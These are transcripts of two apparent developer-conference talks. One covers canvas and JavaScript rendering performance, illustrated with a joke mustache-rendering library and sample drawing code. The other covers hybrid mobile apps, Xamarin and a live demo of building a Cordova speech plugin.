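A simplified sketch of that final approach: because createLinearGradient and stroke are things the canvas already knows how to do quickly, the highlight costs a handful of native calls per shape instead of a per-pixel loop. The coordinates and colors here are made up for illustration:

    function strokeHighlight(ctx, points, lightX, lightY) {
        // A gradient that fades from a soft white near the light source to transparent.
        var gradient = ctx.createLinearGradient(lightX, lightY, lightX, lightY + 80);
        gradient.addColorStop(0, "rgba(255, 255, 255, 0.6)");
        gradient.addColorStop(1, "rgba(255, 255, 255, 0)");

        ctx.strokeStyle = gradient;
        ctx.lineWidth = 6;
        ctx.lineJoin = "round";

        // Stroke the upper edge of the plasticine with the gradient.
        ctx.beginPath();
        ctx.moveTo(points[0].x, points[0].y);
        for (var i = 1; i < points.length; i++) {
            ctx.lineTo(points[i].x, points[i].y);
        }
        ctx.stroke();
    }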
And so and this is so this was an example of where we kind of needed to step outside of the code that had already been written and look at the problem and try to find like a novel solution to that. And that is the perfect segue into the last thing that we want to talk about of course which is Tom Selleck. So we imagine a world and I think Tom Selleck is sort of the best way to think about this where we we could all have the the the benefit of Tom Selleck's mustache. In fact we found somebody else who celebrates this goal with us and we wanted to share this quick video with you as an introduction to what's coming. This is where you can stand up and dance on your seat. So I hope you guys feel it because we feel it. In fact we feel it so much that we created a JavaScript library to help us see the end goal here which is called StashKit. So StashKit web based facial hair delivered as a service. This is the world premiere of the service available soon. Why? Obviously because we want to be first to market. Nobody else that we know of is doing this. Industry knowledge both Joel and I have at some point grown facial hair and most importantly for this talk it turned out that this is an awesome performance test bed. So some of the things that we want to share with you about performance can be really well illustrated through facial hair. Okay let's see it. Here we go. So we'll just orient you quickly to the product. We've got a photo of a handsome gentleman there and he's got an amazing mustache. Of course that is not his mustache. That is rendered with StashKit technology. There's a number of options. So if you wanted to apply the mount man growth formula you could grow the mustache. Or if you're just happy with the instant week we can go back to that. We recognize that there are a number of popular color choices. So if you want a red mustache or if you've got a fair complexion you've got that black. Brown's pretty nice. You could change the curl of the Stash. So maybe wavy, little extra curl there. And of course you've got lots of different choices. So maybe we'll go with this guy. That's kind of fun. We'll shrink it down. That looks pretty good right? Looks amazing. That lucky man. So briefly I'll give you a quick overview of as to how this is working. So we have sort of the templates you can see along the bottom which define the Stash as we call it in code. It's just more fun to call everything a Stash. And so in the actual images we apply a little bit of opacity towards the bottom of the mustache. We load that image into a canvas and parse out the individual pixels. Based on the opacity of the particular pixel we give it a probability that determines the density of the mustache. You obviously wouldn't want a mustache where it's completely dense. You want to be able to control the density. And so that opacity fade gives us a little bit of confidence so that the mustache sort of fades and gives you a natural look. Now of course our favorite feature is the aroma. And maybe I should... Yeah you want to see this one. Let's increase this guy so you can see it in the right place. So it's hard to visually represent an aroma, right? So we put our head against the wall and this is what we came up with. So this was the big challenge. How do we render this mustache at 60 frames a second? You can see right here this is not 60 frames a second. I'll do it again so you can see because you... I'll isolate it. Let's put it over here. You can see... Oh, let's put it up here. Here we'll put it right there. 
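To make that template parsing concrete before the demo continues, here is roughly how reading alpha out of a canvas and turning it into hair density might look. It's a sketch in the spirit of the description above, not the actual StashKit source:

    function buildHairs(templateImage, density) {
        var canvas = document.createElement("canvas");
        canvas.width = templateImage.width;
        canvas.height = templateImage.height;

        var ctx = canvas.getContext("2d");
        ctx.drawImage(templateImage, 0, 0);

        var pixels = ctx.getImageData(0, 0, canvas.width, canvas.height).data;
        var hairs = [];

        for (var y = 0; y < canvas.height; y++) {
            for (var x = 0; x < canvas.width; x++) {
                var alpha = pixels[(y * canvas.width + x) * 4 + 3] / 255;
                // The faded bottom of the template gives a lower alpha, so a lower
                // probability of a hair starting here -- that's the natural edge.
                if (Math.random() < alpha * density) {
                    hairs.push({ x: x, y: y });
                }
            }
        }
        return hairs;
    }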
There we go. So you can see that there's a little bit of stutter in between those frames; it's not completely smooth. Basically what's happening is that when we parse out that pixel data, depending on the mustache, there are quite a few hairs in there. I think one of the bigger ones that we looked at was around 15,000 hairs. And what we're telling the canvas to do for each of those is to take the beginning point, take the length of the mustache, take the inflection point where the curl is, calculate the curl strength using a curve, and then stroke that line. Repeat 15,000 times. And you have to do that every frame, every 16 milliseconds. That's pretty challenging to do, even with the hardware acceleration that the canvas provides, because there are so many consecutive calls. So let's switch back. Let's see if I can do it this time. There we go. What just happened? So I gave you an overview of what happened and how the basics of the framework work. When we did the initial implementation of this, we got around 10 stashes per second. We'd like that to become a new benchmark in JavaScript performance, so if you could take that back and start profiling your code in stashes per second, that would be great. Clearly not good enough for a mustache rendering service. So the first thing we tried was rendering the mustaches by color group. If you saw the mustaches, you noticed that they're not all one color, because that wouldn't look natural; it would just look like one big mass. So there's a little bit of variation: we had, I think, between five and six colors for each complexion, and we would just randomly distribute them through the stash. So we thought, instead of doing 15,000 individual strokes, maybe we can group by color and stroke each color all at once. Canvas has a great API where you can draw a line, move, draw another line, and then stroke it all at once. And in a lot of the games and projects that we've done in the past, we found really good performance benefits from that technique: rather than doing individual operations on the canvas, you group as many together as possible and then do them all at once. So with the four different colors right here, you take the first implementation that we did, where they're interspersed, and we decided to sort the array so that we would have all the colors in one group and could stroke them all together. We thought this was going to be fantastic, and the performance was great; we got great performance out of this. But the problem is, you can see the stash on the left has got that natural look to it, and we didn't realize that by grouping them by color we were basically saying all the colors are going to sit on top of each other in layers, and it doesn't look right at all. It actually doesn't look that bad here, but if you had darker colors on top, it just doesn't look right. So we thought, well, that was a good try, but clearly not going to cut it. So then we thought, let's cache the stash. The approach here, and it's one that we've used on a number of games, is that when you have a sequence of frames that need to get rendered but will be reused, you can draw them to an off-screen canvas, extract the image from the canvas, and create your own little mini sprite sheet where you have the frames for each image pre-rendered, and then you replay that.
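To make those two approaches concrete, here is a minimal sketch of each, with invented hair fields and function names rather than the real StashKit source. The first shows the "stroke it all at once" batching per colour group; the second shows the off-screen pre-render cache that gets demonstrated next.

// 1. Batch by colour: one beginPath, many moveTo/quadraticCurveTo calls,
//    and a single stroke per colour group instead of one per hair.
function strokeHairsBatched(ctx, hairsByColor) {
  Object.keys(hairsByColor).forEach(function (color) {
    ctx.beginPath();
    hairsByColor[color].forEach(function (h) {
      ctx.moveTo(h.x, h.y);
      ctx.quadraticCurveTo(h.cx, h.cy, h.endX, h.endY); // the curl
    });
    ctx.strokeStyle = color;
    ctx.stroke();
  });
}

// 2. Cache the stash: pay the expensive draw once per frame into an
//    off-screen canvas, then replay with a cheap drawImage blit.
function prerenderFrames(drawFrame, frameCount, width, height) {
  var frames = [];
  for (var i = 0; i < frameCount; i++) {
    var off = document.createElement('canvas'); // never added to the DOM
    off.width = width;
    off.height = height;
    drawFrame(off.getContext('2d'), i); // e.g. the 15,000-stroke draw
    frames.push(off);
  }
  return frames;
}

function playFrames(ctx, frames) {
  var i = 0;
  (function tick() {
    ctx.clearRect(0, 0, ctx.canvas.width, ctx.canvas.height);
    ctx.drawImage(frames[i], 0, 0);
    i = (i + 1) % frames.length;
    requestAnimationFrame(tick);
  })();
}

The trade-offs match what is described around this point: batching puts each colour in its own layer, which is why it stopped looking natural, and pre-rendering costs a pause up front while the frames are cached.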
So in this case, we also had a growing mustache animation. You can see up at the upper left it's barely starting to come in, and then each frame it gets a little longer, a little longer, and you have the full stash. With this technique, we were able to get the 60 frames per second, which Robbie calls a stash stash. It is stash stash; there's no other way to say it. That's also a benchmark: when you hit 60 SPS, that's stash stash. So let's switch back to the app. We've got our mustache here, and this is the render-by-color version; we'll show you that. You can see the mustache does not look great; we've got all the colors layered. Let's try a different color. With some of them it really does not look great, because they're grouped together all in one layer. Switch back to this guy. So let's turn on the pre-render. The challenge with the pre-render, and you have to find the right time to use it, is that even though it's going to give you that 60 frames a second, it does take a little bit of time to pre-render all those frames, and then you cache those results. So we'll click the aroma. You'll see that it basically does nothing for a few seconds while it's caching the result, and then you can see the smooth stash-tastic animation. And silky. Just like you want it. So you can see that that is much, much smoother than the original implementation, and it's because we're basically just replaying that series of frames that we've already rendered. We thought we'd have a little bit of fun with the webcam API, so we added that feature in. Let's see if we can do it. Any volunteers? Should we make Robbie do it? I'll do it. There you go. All right. So that's a lot of stash for me. I'm not complaining. I think the lighting might be... We do have an enhance tool to help with the lighting. Let me turn that on. Oh, there we go. Oh, yeah. That's way better. There we go. Robbie looks amazing. I think we can all agree. So this is coming for all of you. So keep an eye out for StashKit. You can stay tuned on thinkpixelab.com. We really will deploy this. We've actually been working on this on and off for like two years. We've been having fun. We felt like maybe we could do eyebrows. There's one sort of Yosemite Sam thing that looks like it could be a toupee. Although David Hasselhoff definitely does not need that. But it doesn't hurt. Yeah. All right. So yeah, with that we have 60 stashes per second and we have perfect rendering, as you can imagine. So, you know, I think the things we talked about today in terms of performance are probably things that you already understand at some level. But if you took one thing away today, it would be to write great code that you can understand, that other people can understand, and then optimize the 3% of it that matters. And when you're optimizing that 3%, this is our approach. We look at the hotspots using the best tools. We showed you the IE performance tools because that was a project for Internet Explorer; Chrome and Firefox also have great DevTools, and all of them I think have a great profiler now. A lot of times you will find that the performance just won't get better by refining your code. That's when you get to think creatively: you rethink the approach that you're taking, or whether there are other ways you can accomplish the same thing. And last is an invitation to experiment and refine, because this is where you learn and it's also where you typically tend to solve the hardest problems.
And I think that is it. So yeah, we hope you guys have enjoyed the talk. If you have feedback, we'd love to hear that. If you have questions, we're open for those as well. Oh, there's a question. All right. Let's take it. Go ahead. For the Contre Jour shading thing, I understand WebGL wasn't an option because of browser support, but did you play with WebGL at all? It wasn't an option, so we didn't play with it. Today I think we would. This was about two years ago and there was just not a lot of great WebGL support at the time. Now there is. Also, this was a project with Microsoft, and Internet Explorer in particular did not support WebGL at the time, so it would have been awkward for them had we shipped a game with WebGL. But that really is the right thing to do for sure, and that's how we would do it today. Definitely. That's a great question. Yeah. Performance is usually quite critical in games. How did you find moving from doing normal software across into games? So I forgot we're supposed to repeat the question. The question was: performance is obviously a critical part of writing games; how did we find the process of going from typical, maybe line-of-business, software to creating games, and what are the different kinds of performance constraints that you deal with there? Do you want to take that one? Yeah, at least for me, I came from a server background where I was working on server code, and there actually is a big performance focus there because you have to handle so many concurrent users. So for me it was fairly natural; I've always loved performance. I think the challenge is what we talked about: not getting overly enthusiastic about performance and really letting the profiler guide that process of optimization. It's so easy as developers to get excited about maybe an article that we read that says this little JavaScript tip led to huge performance gains, and really knowing when to use that. In most cases it's probably not necessary and it will overcomplicate the code. So I think as a developer, over my career it's been more about learning when the right time to optimize is and really using the tools to guide the choice of where to optimize. That's great. Yeah. When you are rendering out what you're seeing onto the canvas, is your render loop basically just loads and loads of manual calls for every little bit, in terms of primitives like rectangles and stuff? Are there any libraries for working with canvas that you recommend? Do you want me to take that? Sure, you can start. Yeah. So the question was, when you're working with canvas (for those of you who aren't familiar with it, canvas is basically just a surface onto which you can draw whatever you want; you have open season with pixels on a canvas in HTML5), is there a library that we like to use, or are we using the native canvas API? We've gone through several libraries. There's one by Grant Skinner called EaselJS, which we used for a couple of early projects and which we liked. Recently we've been using a gaming framework called Phaser.io, if you guys are familiar with that, and that one actually has WebGL support for both 2D and 3D if it's available. It's really cool; we're actually really happy with that one. With Cut the Rope, and also with Contre Jour, we were doing a port.
And so, because we really needed to stay in sync with the code that that developer had already written, it wasn't as easy, or didn't make as much sense, to use another framework. So for both of those we're just rendering directly with the Canvas API. Yeah, and in terms of primitives versus images, I think it's a mix. In games there are a lot of sprite-based animations, so a lot of it is drawing images, and then there are some primitives, whether it's polygons or lines or things like that. I think you had a question. When porting the physics engine from Objective C to JavaScript, did you have to change anything in the algorithm? Is there any math computation that's inherently impossible or very hard to do in JavaScript? It's a great question. Yeah. So the question was, were we able to take the Objective C physics engine and use that directly in JavaScript, or did we have to modify any of the algorithms? We tried not to modify any of the algorithms. We tried to focus on low-level optimization, just because we were afraid that if we changed the algorithm it would change the results, and we wanted the game to feel identical to iOS. But we had to do a lot of optimization. So those early code examples where we talked about removing vector allocations, removing arrays, being really careful about calling functions inside tight loops where the physics engine was operating: those are the areas that we had to focus on. So we didn't change the algorithms, but we had to do a lot of performance work to get them to run at high speed. Go ahead. Are there any good tips on... you spoke about benchmarking, but you can't really benchmark this directly. Some canvas operations are a lot slower than others, and all the Chrome (or whatever) profiler will tell you is time spent on canvas, but maybe you could make it faster by having it opaque and not semi-transparent, or things like that. Are there any good ways to profile in that area? Yeah, that's a great question. So the question is, are there any good ways to narrow down the areas when you're drawing, to be more specific and find the hotspots? And I think for us it was a little bit of trial and error and a little bit of reading. There are lots of good resources on the web that talk about tips for performance. We went through a lot of those, and some of them panned out for us; some of them didn't, depending on the platform. One in particular I can remember was a recommendation to use multiple canvases and stack them on top of each other. We had a hard time getting performance out of that. It may have changed now. Another interesting thing is that because the browser engines are improving so quickly, it really is a moving target: a technique that works today may not work tomorrow. So it's better if you can find the approach-based or algorithmic improvements, which will always do better. And I think for us it was just a process of trial and error combined with some guide points to start from. Yeah, exactly. Any other questions? Well, we've had a lot of fun, so thank you guys. Appreciate it. Thank you.
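On the "removing vector allocations inside tight loops" point from that answer, here is a generic sketch of the kind of change involved; it is not the actual Contre Jour physics code, just an illustration of why allocation in a per-frame loop hurts.

// Allocating version: creates a brand new object on every call. Called
// thousands of times per 16ms frame, this eventually forces garbage
// collection pauses that show up as dropped frames.
function addAllocating(a, b) {
  return { x: a.x + b.x, y: a.y + b.y };
}

// Allocation-free version: mutate long-lived objects in place instead.
function step(points, gravity, dt) {
  for (var i = 0; i < points.length; i++) {
    var v = points[i].velocity;   // objects created once, at load time
    v.x += gravity.x * dt;
    v.y += gravity.y * dt;
    points[i].position.x += v.x * dt;
    points[i].position.y += v.y * dt;
  }
}

The same reasoning applies to avoiding temporary arrays and avoiding extra function calls in the hottest loops, as mentioned above.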
|
For far too long the web has gone without a fast, reliable framework to render fake mustaches. The handlebar, mutton chop, and soul patch will guide us in our journey to optimize canvas and JavaScript performance. We’ll discuss our pragmatic approach to performance optimization and walk through real world challenges we solved while developing HTML5 games like Cut the Rope and Contre Jour.
|
10.5446/50813 (DOI)
|
Hello. Good morning. It's working. Thanks very much for coming this morning. I wasn't expecting quite such a big crowd after the party last night, so I'll try and make this worth your while for getting up and coming through. I've never spoken at NDC, so I'll just introduce myself. I'm Kevin. I'm a software developer with Redgate in Cambridge. We have a booth out in the Expo Hall, so come and say hello to us; we're not at all scary. If you have any questions throughout the talk, feel free to throw up your hand. Otherwise, grab me afterwards, or else I'm on Twitter, so tweet me and I'll get back to you. Why are we here this morning? I want to show you what's been happening in hybrid apps. Just to do a bit of expectation setting: who knows what hybrid apps are? Just a show of hands. Most people. Just as a quick refresher, hybrid apps allow you to write most of your app using web technologies and web standards, and then some of your app using the native platform, but it feels like a native app. It started on mobile and now spans both mobile and desktop, so I'll cover both. I have a slightly secondary goal of trying to encourage you to use them, because I think it's a very nice technology, with the caveat that anyone that tells you technology X is the perfect solution and will fix all of your problems is either lying, wrong, or both. I think hybrid apps are really nice for certain use cases when used appropriately. Before hybrid apps, your options were to write things using a native toolkit. On both mobile and desktop, this is what people have been doing. On iOS, you write Objective C, or Swift now, I guess, and on desktop you would just use whatever: Cocoa or WPF. From an architecture point of view, this looks like: the vendors provide some sort of device with an SDK, compilers and UI libraries. Then on top of that, you'll write your business logic; on iOS that would be Swift, on Android you'd be using Java, on Windows Phone you'd probably be using C sharp. Then you'd define a separate UI for each of these, using Interface Builder on the Mac for iOS, using Android XML if you want to declare the UI declaratively on Android, or XAML on Windows Phone. And then the little cloud icon shows that pretty much every app on mobile, and certainly line-of-business apps, is backed by some web service, so your app doesn't stand alone; it's backed by something. Building things natively has a lot of advantages. I've grouped a few of them together as: you're using the supported tool chain. This has some knock-on consequences, because you're basically using the tool set that the vendor used to actually write the OS and write the first-party apps, so things like debuggers, profilers, documentation, the activity on Stack Overflow (which is how we all program), all that stuff is there for you. Performance also tends to be quite good, either because you're compiled to native machine code or because you're using the APIs that the vendor used, which are all heavily optimized paths. You get the look and feel of the vendor apps just through the fact that you're using their controls, and you get a lot of that for free.
One that people often don't think about but is useful is the fact that the vendor now controls distribution for a lot of us: on mobile certainly through the app stores, and also now on Mac and Windows there's a move towards app store distribution through the Mac App Store and the Windows Store. If you use all the native tools and do exactly as the vendor tells you, you have a better chance of getting submitted and getting through without having your app go through cycles of rejection. So why don't we all just do native? That would seem like the best solution. Well, it has lots of disadvantages. The obvious one is duplicated code: you're writing that app X times for the X different platforms that you're targeting. It's slightly worse than that, however, because you're also writing that code in different languages, so there's no common language across all these platforms. And it gets even worse again, because there are different platforms that you're having to write that code on: if you're targeting iOS, you're going to have to get a Mac and use Xcode, a different environment; targeting Windows Phone, you're writing in C sharp and you're in Visual Studio. That context switching can be relatively expensive for small dev teams. And even if you pay that penalty up front and do all that work, it's an ongoing pain because it has maintenance costs: if you want to add a feature, even a small feature or a small bug fix, you have to do it X times. You can't really do a talk on hybrid without covering Xamarin. Has everyone heard of Xamarin and know what they are? That's a surprisingly small number; I thought this audience would know more. Xamarin is a really, really nice technology and it allows you to target Android and iOS using C sharp, so you have a common language across all the platforms, but you're still building native apps. If we look at what that looks like, you still have iOS and Android and Windows Phone, the base OS with all of the SDKs. Xamarin then provides an abstraction layer on top of that called Xamarin.iOS and Xamarin.Android. That layer is very thin and marshals from nice C sharp types and C sharp idioms through to, in the case of iOS, the Objective C native APIs, and in the case of Android, the Android SDK. It's basically all P/Invoke calls, but it's very nice. On Windows Phone, Microsoft obviously have C sharp as a first-class citizen. Using this tool chain, you get full C sharp coverage and it's still native. The idea is that on top of that, you write a common C sharp business layer. That goes 100% shared: that's the thing that's calling out to your REST services, or doing some computation, doing validation, all that sort of stuff. For the best UX, to really make it feel like a first-party app, you still need to build separate UIs: you still need to use Interface Builder, use XML on Android, or else build some XAML. With the latest version of Xamarin, it's actually quite interesting: they've released Xamarin.Forms, which merges those top three boxes. It's not a perfect solution, because although they're native controls and will feel fast, the UI paradigms are different enough across the platforms that to truly feel like an app that was made by Apple, you'll still need to build separate UIs. So Xamarin: really nice solution, and you really get all the same advantages as native. It's the way the tool chain works: it compiles through the Mono compiler, produces MSIL, which gets compiled down, so you produce actual machine code.
The code that executes on the device is no different whether you went through the first-party compiler or the Xamarin stuff. You have fewer languages to learn: for the majority of your app, you're still writing in C sharp, which is really nice. You have fewer environments for big chunks of your code, so you can use Xamarin Studio or MonoDevelop across all platforms, or you can stay in Visual Studio. The big one is that you get to reuse your existing skills. Over the last 14 years, we've all been building up lots of C sharp expertise, so now we get to reuse that and target the mobile platforms. It's not a perfect solution; everything's got disadvantages. For Xamarin, there's still some duplicated code, with all of the problems that that has. It depends on the nature of your app how much duplicated code you've got. If you're doing pretty much everything in C sharp, then obviously you've got really good code sharing. I think Hanselman, in his talk on Wednesday, gave some really good examples where games can get 95% code sharing because they're doing all the drawing and stuff themselves. If your app is just something that calls out to some cloud service to get JSON and then renders it on screen with some forms, then a big chunk of your app can actually be that UI layer, so if you want to build separate UI experiences for each platform, you still have a lot of duplicated code. Just because we're C sharp devs doesn't mean we're mobile devs, so you'll still need to learn how to work with all the different platforms to make apps that feel like they belong on the platform. And then the big one, I guess, depends on what you care about: I quite like Xamarin and I trust them not to screw me, but it is a proprietary tool chain. So for your core app, you're now putting someone between you and the actual device vendor, and that's closed source. So you get all the things that come with vendor lock-in: they could increase prices or remove platforms, that kind of stuff, or they could lag behind native if iOS 10 gets released with some new feature that you want to use. I think it's not so important, because Xamarin is a good company. So that brings us to why we're actually here this morning, which is hybrid apps. Hybrid apps came out of mobile, and at the start there was really no clear winner in which device type was going to win, and that's still true. So we have to at least, as developers, target iOS and Android, and increasingly we have to target Windows Phone as well. So people looked for commonality across the devices to see what's actually there on each of them, and really the best common denominator is the web browser. So you can create an app that gets a web view on the screen: an app that users install through the app store and that kind of thing, but it uses the web to actually render all the content. There's a bunch of companies that do this. They all have their merits, pros and cons, but the biggest one, the one that's got the most market share and the most traction, is Cordova, or PhoneGap. I'll probably use those interchangeably. For those of you that don't know, it's reasonably complicated, but PhoneGap is basically the trademarked name of the open source Cordova project. You almost certainly have apps built using Cordova on your phone. There are a few really big ones like Untappd, which is sort of like Foursquare for beer, so you get to drink beer and then check in to say, I drank this delicious beer and you should all drink it.
Well, I haven't been using that much in Norway because, as nice as your country is, your beer is really, really expensive. These stats are from PhoneGap Day EU last year, where the Untappd creator was on stage speaking about his experiences. His growth curve was crazy, but at that stage he had over a million users that were checking in about 45 million beers a month, and none of those users care that it was built using PhoneGap. They just care that it's a really nice app that lets them share their passion with people. Another good example of a PhoneGap app that you may have used is 2048, which is that very addictive game where you move the numbers around to double things up and then pull your hair out when it doesn't work. That was built using PhoneGap, and in both cases they could reuse their existing web skills to get something on mobile that users love. Microsoft have also released first-party support for Cordova now, so in Visual Studio there's a CTP out where you can just go File, New Project and get a Cordova app up and running, with emulators and debuggers and all the stuff that you want. So this is what Cordova and most of the hybrid apps have looked like from an architecture point of view so far. The device layer, again, is iOS, Android, Windows Phone, and Cordova supports every other platform that you could possibly imagine. There's a native piece of code which takes all of the native features of the device, so all of the hardware and all of the API surface, and projects that through a consistent JavaScript API. The aim with Cordova is that the JavaScript API will be web standards where possible, and they basically act like a polyfill: anywhere there's not a web standard to do what you want to do with the device, they'll create one and try and encourage the browser vendors to standardize it. And then against that consistent JavaScript API, you can write all of your app in JavaScript and all of your UI in HTML. The problem with this is that, you may have noticed, I've called this the heavy Objective C app and heavy Java app, and that's really because Cordova traditionally has been essentially a single big native app that projects out all of the API surface of the native devices, and that leads to a very large code base, reasonably long compile times and reasonably long startup times. So in the last year or so, Cordova has moved away from this architecture to something that's really nice: Cordova now is basically a plugin framework. The native code doesn't really do anything anymore apart from provide a mechanism to load plugins, and those plugins can do the things that Cordova has traditionally done, like GPS or storage or NFC or whatever, and each of those plugins feeds into this consistent JavaScript API, which you can still use to build your app. The plugins for doing the core things that you'd expect are all maintained by the Cordova project, but what I want to show this morning is how easy it is to take something and add it into this plugin space. This could be something that only your phone does, like Siri, or something that isn't part of a standard yet, or it could be existing native code that you have, to do crazy CPU-bound image manipulation or something. So that will be the first demo. Let's see if it works. I'm going against all wisdom here and doing some live coding. Let's see how it goes. So I'm going to make a directory for this NDC demo.
And Cordova have a handy command line tool called the Cordova CLI, which you can install, and which works a bit like Rails scaffolding, if you've used that, for building projects really fast. So I can just do cordova create NDCDemo123, and then you have to give it an ID, which follows the Java-style ID convention. And that will create my project. So if we take a look at what that's actually created, you can see that I have my www folder, which is the actual app, the JavaScript and HTML that make it up. I have plugins, where there are none yet, so this won't be able to access any native features that aren't part of the web spec. And then platforms: this is the actual native code that runs on the device, and as you can see, I don't have any yet. So let's jump back to the Cordova CLI and add a platform. I'm going to add Windows Phone 8, just because it's easy to demo on this machine, but you can add Android or iOS or whatever else you want to use in the same way. And then if we jump back to platforms, you can see the Windows Phone 8 folder has been created, and in there there are all the csproj and sln files that you'd expect. So let's jump over to Visual Studio and open that guy up. It just follows the same file structure as the www folder from my actual app. The addition is this CordovaLib: this is the skeleton thing that gets the actual app up on screen, opens a web view, loads your assets into that web view, and that kind of stuff. So if we run this guy, then over in my emulator... come back. He's there. Let's close the emulator. Start it again. So this is compiling the code, embedding those assets, the actual web assets, as resources, and then it will deploy to my emulator. Not having an emulator sort of makes these demos not work. Yeah. How do you do that? Oh, it's right there. Ah, well spotted. Yeah, I would never have worked that out. So here's my app loaded in the emulator, and you can see this green pulsing bar that just says this app is ready to go. It doesn't really do anything particularly interesting at the moment. So let's add a plugin that exposes something that isn't part of the web spec yet, but that my Windows Phone can do. The thing that I've chosen to demo is speech. So I have something up on GitHub here, just a skeleton plugin, just to save creating that boilerplate, which if we take a look at it has native source for Android and Windows Phone. That's the actual native code that's going to do, to begin with, text to speech: give it a string and it speaks it aloud. And then in the www folder you've got speech.js. You'll notice that although I had two native platforms, I've only got one JavaScript file, and that's the aim: you can add platforms in, but your consistent JavaScript API doesn't change across platforms. So if I go back, copy this to the clipboard. Where's this guy? So that's cordova plugin add, give it that git repo, and it will do the clone for me and add things to the right place. And then when I jump back to Visual Studio, you'll see it's noticed that the SLN file has been updated and the project has been updated, so let's reload. And now we've got some additional things added. We've got this plugin added, which is the native code. If we look at that, you'll see it inherits from this BaseCommand, which is just the way you define plugins for Windows Phone in C sharp (Java on Android has similar idioms), and it uses a speech synthesizer.
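For reference, the JavaScript half of a plugin like this is tiny. The sketch below is roughly what the speech.js shim looks like, as described in the next part of the demo; the exact names in the demo plugin may differ, but cordova.exec(success, error, service, action, args) is the standard Cordova bridge call.

// speech.js: the consistent JavaScript API that sits in the www folder.
var speech = {
  speak: function (text, success, error) {
    // Ask the native side to find the 'Speech' class and call its
    // 'speak' method, passing the text across the bridge.
    cordova.exec(success, error, 'Speech', 'speak', [text]);
  }
};

// App code: wait for deviceready so the native side is initialised.
document.addEventListener('deviceready', function () {
  speech.speak('Norway is awesome',
    function () { console.log('spoken'); },
    function (err) { console.log('speech failed', err); });
});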
So that's not available on the web, but we've made it available. And then when our app loads in the web view, there's now a JavaScript file called speech.js, and all it defines is a single JavaScript function which takes some text and some success and error callbacks. All it does is call this cordova.exec function, passing along success, error, a string which is the class that I want it to go and look up in my native code, the method in that class, so speak, and the array of arguments I'd like to pass along, so the text in this case. Because this is Windows Phone and the security model requires that apps declare what they need, we have to switch on some capabilities. So I'm going to switch on the microphone, which I'm going to use in a second, and switch on speech recognition, because that's the thing that actually does text to speech. And then over in my app, this ondeviceready handler gets called whenever Cordova has started, which says all the native stuff has been initialized and you can start doing device things. I can just do speech.speak, Norway is awesome. Let's see if this works. I don't know. Norway is awesome. Yay, it worked. So that's a plugin that I had prebuilt. But I want to show you how easy it is to extend this to add some new native functionality that I want to expose. So let's say I wanted to do speech recognition, which is definitely not a widely deployed part of the web standard yet. Let's start from the outside in. When this becomes part of the web standard and gets widely deployed, it'd be really nice if there was a function like speech.recognize. I just want to recognize some text, so it doesn't take any args, because I just want it to recognize whatever it hears, but I would like it to call me back with whatever it heard. And then you can imagine, if this was a conference app or something, you could filter by speaker based on what name had been spoken. But for the purposes of this demo, let's just alert it to the screen. Okay, so that's my app built; that's what I'd like it to do. The JavaScript plugin that shims across to the native code needs to define a separate function, that recognize function, and you'll see how little has to change here. So I define the function. It doesn't take args anymore; all it takes is a success and an error callback. I still want to use that same Speech class that we defined in C sharp, but now, instead of the speak method, look for this recognize method. And I'm not going to pass along any args, because there's nothing to pass to this method. And then over in C sharp, let's just define this method. All methods that go across the bridge from the web view into C sharp follow the same signature, which is void MethodName(string options), and that string is a string of JSON. You can use JSON.NET to deserialize it, or else Cordova provide this JSON helper. We're not actually taking any arguments, so we don't need that. Now, I just happen to know that there's a thing called SpeechRecognizerUI, which has some settings, and one of those is show confirmation. We don't need this because we're going to alert to the screen, but you could use it; you can see that you get the full API, so you can do all the language detection and stuff. I can use that recognizer to recognize with some UI. This is async, so if I did this properly, I'd use await and do it all nicely.
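Before the C sharp continuation gets finished just below, here is the JavaScript half of that recognize feature, again sketched with approximate names rather than the exact demo code:

// speech.js: no arguments this time, just success/error callbacks.
speech.recognize = function (success, error) {
  cordova.exec(success, error, 'Speech', 'recognize', []);
};

// App code: whatever string the C sharp side hands to
// DispatchCommandResult arrives here as the success callback's argument.
document.addEventListener('deviceready', function () {
  speech.recognize(function (spokenText) {
    alert(spokenText);
  }, function () {
    alert('Sorry, recognition failed.');
  });
});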
But just for now, give me the task, and on that task continue with a function which uses the task, which has a result, which has a recognition result. Again, this is terrible and you wouldn't do it like this in reality; you'd do proper error handling. That recognition result has the actual text that has been spoken, so this is my spoken text. So now this recognize method will get called. It'll return almost instantly because it's async, and some time later my continuation will get called to say that it has finished and has hopefully detected some text. Now I want to pass that result back to the web view; I want to call that success handler that we defined in JavaScript. Cordova makes this really trivial: you have DispatchCommandResult. I am a plugin, so I will give you a PluginResult. I won't do any error handling because this will definitely work, so I'll just say that everything was okay, and the only argument to that success callback is the spoken text. Okay, so that should be it. Let's see if it works. So I press play to deploy it. My app starts. Norway is awesome. It does the speak bit from earlier. Because this is the first time this app, in fact this phone, has ever used speech recognition, it's asking whether everything is okay, so I say that it is. Will this detect my accent, or should I have spoken like an American? Pretty close. So you can see that it's pretty easy to take native functionality and expose it. On iOS you could have used Siri here; on Windows Phone 8.1 you could have used Cortana, which does much better recognition. But the idea is that in five or ten lines of code you can really quickly build up an app that exposes some native stuff. This could even be something in your business, some existing C sharp code that you want to expose. Where did the PowerPoint go? Okay. And the idea is that over time these plugins will become fewer and fewer: you'll be able to deprecate some of the native plugins as their functionality becomes part of the web standard. This has already happened for things like the file system, where you used to have to have a plugin, a polyfill, that gave you access to the file system, but now most of the mobile web browsers support that. So I've been working on hybrid apps on mobile for a while and I really like the workflow. I think it's a very productive way to work and a great way to share code. But I work at Redgate and we don't actually build many mobile apps; we're still mostly on desktop, actually. So what I wanted to see was: could I take the workflow advantages that you get with hybrid on mobile and bring them to the desktop? When I first started looking around, the best way to do this seemed to be to use the built-in IE web browser control. But that's really scary, because you don't know what version of IE is going to be installed on the end user's machine. You don't want to leave something like that up to chance: it'll break on their machine and they'll be very unhappy. So it'd be really nice if you could distribute just the control, not a browser, but a browser control which is modern, standards compliant and really good. When I looked around, I found Chromium Embedded. Chromium Embedded, or CEF, is essentially the core of the Chrome web browser repackaged as a library, so you can distribute it along with your app.
